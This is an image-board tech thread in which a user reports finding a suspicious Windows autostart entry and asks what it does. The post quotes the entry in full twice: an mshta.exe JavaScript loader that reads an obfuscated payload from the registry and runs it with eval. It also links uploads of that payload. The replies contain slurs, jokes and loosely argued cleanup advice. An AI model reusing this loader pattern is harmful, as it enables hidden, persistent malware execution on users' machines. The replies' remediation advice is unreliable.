Thread replies: 17
Thread images: 2
Thread images: 2
File: warning.jpg (37KB, 497x197px) Image search:
[Google]
37KB, 497x197px
Hello /g/, i have something which might interest you.
Recently this link showed in my Autostart folder (it's Windows 7):
C:\Windows\system32\mshta.exe "javascript:rCc94e="r";K8d=new ActiveXObject("WScript.Shell");Y6eEC0="lyI6mn";Kbvy6=K8d.RegRead("HKCU\\software\\lkxbln\\ruirnfsd");EXipXG4s="gJnaK";eval(Kbvy6);UTb2tk="CtA";"
It was not very annoying, but I suspected it to be a virus, and dealt with it by removing the link from Autostart folder, as well as deleting the registry entry. Before deleting, though, I looked at what was inside the registry value. It was a very obfuscated (49 KB) Javascript code, which is beyond my reach. There were also 7 other keys in the entry.
I saved the registry entry outside and removed it from the registry.
Here you can find the registry entry if you are interested: https:||filetea.me|t1sCxAzwdpPSGq9H0FGmmvWQQ (ofc, deal with care)
What does the command do? Is it dangerous?
>>
Did the file expire? Alternate link:
https: filetea.me t1sDlOc2qd2S8eCaDoM9H8n7w
>>
>>57044000
what the fuck is filetea? pastebin that shit nigger or get out
>>
>>57044072
I can't pastebin the registry file.
I mean, I can copy paste contents to a txt, but I noticed that by doing so I lose information from one key (only the beginning 16 or so characters were being copied, and the key is like 30 kB in size).
If filetea isn't good, where should I upload the registry file?
>>
>>57044298
Zippyshare
>>
>>57044317
Okay, done.
http://www35.zippyshare.com/v/WyxMaek8/file.html
>>
>>57044399
Downloaded it and now i can't find my wife or kids
>>
>>57044588
same
wtf i hate windows now
>>
File: ss (2016-10-12 at 18.41.29).png (356KB, 1041x704px) Image search:
[Google]
356KB, 1041x704px
>>57044399
Why do you think this is javascript again?
>>
>>57044633
Because of what I wrote in the first opst
>C:\Windows\system32\mshta.exe "javascript:rCc94e="r";K8d=new ActiveXObject("WScript.Shell");Y6eEC0="lyI6mn";Kbvy6=K8d.RegRead("HKCU\\software\\lkxbln\\ruirnfsd");EXipXG4s="gJnaK";eval(Kbvy6);UTb2tk="CtA";"
>javascript
>>
>>57043963
>>57044000
Use pastebin or something or gtfo.
1. we arn't your personnel tech support site
2. thinly veiled personal army request
3. why would YOU being infected interest ANY of us?
>>
>>57044781
>3. why would YOU being infected interest ANY of us?
came here to post this but you beat me to it
OP, it sucks to be taken over, we've all been there before.
Why do you think we're worried about you though? We aren't.
Install Ubuntu already you fag
>>
>>57043963
Also Ill say remove all .exe files from your backups.
You are only allowed to save images, music, movies, text files, any BASIC file type that Ive forgotten, and also compressed archives not containing any not listed file formats.
Compressed archives that happen to contain any files not listed as allowed to keep must be decompressed, all approved file types set aside with the rest of the backups, then after complete reinstall you can recompress them.
You need to reinstall from a disc, not a recover partition or flash media, that is an retarded meme and is not secure.
You are now allowed to keep .pdf files, any of the million executable types, any java files that are not source code, etc.
You are not allowed to keep drivers or firefox-installer.exe, they could be contaminated. You either need to get the checksum of it and compare it to the site for each download, or simply just redownload it after the reinstall, if youre not retarded youd just redownload it.
any .iso file could become contaminated, do not keep them any more either.
>>
>>57044824
>>57044781
I might have worded it a bit wrong.
I don't know if it is a virus. If it did not blatantly show up in the Autostart forder, I'd probably ignore it and would not notice its existence.
I don't care if you care, are interested or worried about me.
I have posted all of this because I thought that maybe someone (with spare time and knowledge) would be interested in solving and deciphering the code in the post. If no one is, it's fine too.
>>
>>57045090
do this >>57045115
and see if it comes back.
But first, do a scan with malware bytes, and upload C:\Windows\system32\mshta.exe to virust total.com
does it show up in ms config?
>>
>>57045166
>>57045090
Thank you for tips about what to do when a computer gets infected. I know (mostly) what to do about the infection though. I simply don't care - if my computer gets badly damaged by viruses, I'll simply wipe everything and reinstall the system. I don't have any important files on it, so I'm not worried about any data loss, data malformation and such. I don't send any files to the internet besides occasional jpegs, too.
I just wanted to know what is in the script contained in the link and the registry file.
>>
>>57045384
youd need an autist crypto fag that is bored to help you with that one.
also, you are aware that the main line of defense against viruses is your router, and that once a computer in the network is infected it can freely contact the other computers in the network and scan for vulnerabilities that otherwise wouldn't be exposed.. right?
tldr, you know it could potentially send viruses to other computers without too much trouble, right?
Thread posts: 17
Thread images: 2
Thread images: 2